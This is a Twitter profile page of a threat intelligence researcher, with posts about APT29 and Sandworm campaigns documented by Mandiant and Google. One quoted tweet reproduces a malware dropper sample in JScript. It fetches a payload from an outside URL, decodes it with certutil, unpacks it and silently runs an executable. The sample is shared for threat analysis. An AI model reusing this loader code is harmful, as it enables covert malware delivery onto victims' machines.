Luke Jenkins

52 posts

Luke Jenkins

Luke Jenkins

@LukeJenx

I does cyber

Katılım Eylül 2009
400 Takip Edilen187 Takipçiler
Luke Jenkins retweetledi
John Hultquist
John Hultquist@JohnHultquist·
New from Google Threat Intelligence: An actor who may be related to APT29 is abusing ASP to target Russian critics. Collaboration with our good friends @citizenlab. More info on the activity and TTP in the blog. cloud.google.com/blog/topics/th…
English
2
26
98
11.3K
Luke Jenkins retweetledi
billy leonard
billy leonard@billyleonard·
🆕🚨 New analysis from @Google TAG on suspected APT29 waterholes against 🇲🇳 gov. n-day exploits targeting iOS and Android we first observed in use from commercial surveillance vendors🫢 more details in the blog! awesome work from @_clem1 and team🤝 blog.google/threat-analysi…
English
2
88
157
56.6K
Luke Jenkins retweetledi
Dan Black
Dan Black@DanWBlack·
Grateful to @RUSI_org for allowing me to share thoughts about the re-focusing of Russia’s cyber campaign to provide battlefield advantages to its conventional forces. Signals from mobile devices have become a prioritized form of targeting intelligence. rusi.org/explore-our-re…
English
3
38
72
20.8K
Joe Słowik 🌻
Joe Słowik 🌻@jfslowik·
Can you unearth an intrusion set that's been publicly documented for over a decade? I have 44 reasons why that seems weird! (Also, where the fuck are Turla and Berserk/Energetic Bear?)
English
3
0
17
4.5K
Luke Jenkins
Luke Jenkins@LukeJenx·
@c_APT_ure @HackingLZ @Mandiant Yes it looked like it's probably just the lea instructions that are in the incorrect order in the comment. But I'll double check when I jump online next.
English
0
0
1
107
Justin Elze
Justin Elze@HackingLZ·
APT life is wild var a = new ActiveXObject("WScript.Shell"); function sendRequest(url) { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var response = xhr.response; var fso = new ActiveXObject("Scripting.FileSystemObject"); var file = fso.OpenTextFile("C:\\Windows\\Tasks\\invite.txt", 2, true, 0); file.Write(response); file.Close(); a.Run("certutil -decode C:\\Windows\\Tasks\\invite.txt C:\\Windows\\Tasks\\invite.zip", 0); var startTime = Date.now(); var endTime = null; do { endTime = Date.now(); } while (endTime - startTime < 3000); a.Run("tar -xf C:\\Windows\\Tasks\\invite.zip -C C:\\Windows\\Tasks\\ ", 0); var startTime = Date.now(); var endTime = null; do { endTime = Date.now(); } while (endTime - startTime < 3500); a.Run("C:\\Windows\\Tasks\\SqlDumper.exe", 0); } }; xhr.open("GET", url, true); xhr.send(null); } sendRequest("https://yoloinc/util.php"); from the sample here - mandiant.com/resources/blog…
English
8
19
145
43.7K
Luke Jenkins
Luke Jenkins@LukeJenx·
@c_APT_ure @HackingLZ @Mandiant Let me take a look at this, could be I just never updated the comment itself whilst refining the rule. The binary pattern itself would be accurate.
English
1
0
1
104
Luke Jenkins retweetledi
Virus Bulletin
Virus Bulletin@virusbtn·
In their latest blog post Mandiant's Luke Jenkins & Dan Black show how APT29 used a variant of the WINELOADER backdoor to target German political parties with a CDU-themed lure. mandiant.com/resources/blog…
Virus Bulletin tweet media
English
1
22
46
5.7K
Luke Jenkins retweetledi
John Hultquist
John Hultquist@JohnHultquist·
APT29 (Midnight Blizzard/Cozy Bear) is targeting German political parties. The SVR has been on a tear lately and their mission of keeping Putin up to date on the West's thinking is especially important at this critical moment in the war. 1/2 mandiant.com/resources/blog…
English
6
103
192
52.5K
Luke Jenkins retweetledi
Dan Black
Dan Black@DanWBlack·
New report from @Mandiant detailing APT29's expansion of interest beyond diplomatic missions. We judge this to be an early warning signal to other political parties and civil society groups across Europe/the West that they are also in the SVR's sights. mandiant.com/resources/blog…
English
3
54
89
41.6K
Luke Jenkins retweetledi
Sandra Joyce
Sandra Joyce@JumpforJoyce·
Russia’s Sandworm shifts to Living Off the Land techniques targeting Ukrainian power grid in a long history of attempting to terrorize the Ukrainian population. @Mandiant mandiant.com/resources/blog…
English
0
18
48
3.8K
Luke Jenkins retweetledi
Dan Black
Dan Black@DanWBlack·
Today, @Mandiant, collaboratively with @Google’s TAG, is releasing research on APT29’s increased pace of phishing activity against governments, foreign embassies, and other diplomatic entities in 2023. A few high-level takeaways below: 🧵 mandiant.com/resources/blog…
English
2
115
220
58K
Luke Jenkins retweetledi
HagueTIX
HagueTIX@HagueTIX·
Check out @gabby_roncone and @DanWBlack’s latest blog post on the Russian GRU’s playbook in Ukraine based on findings first presented at #HagueTIX2023
Gabby Roncone 🇺🇦 🇵🇸@gabby_roncone

As @Mandiant digs into ties btwn Russian disruptive and "hacktivist" actors conducting operations in Ukraine, we've seen technical and strategic patterns emerge. We outline these patterns during wartime in the GRU Disruptive Playbook. mandiant.com/resources/blog…

English
0
5
13
2.2K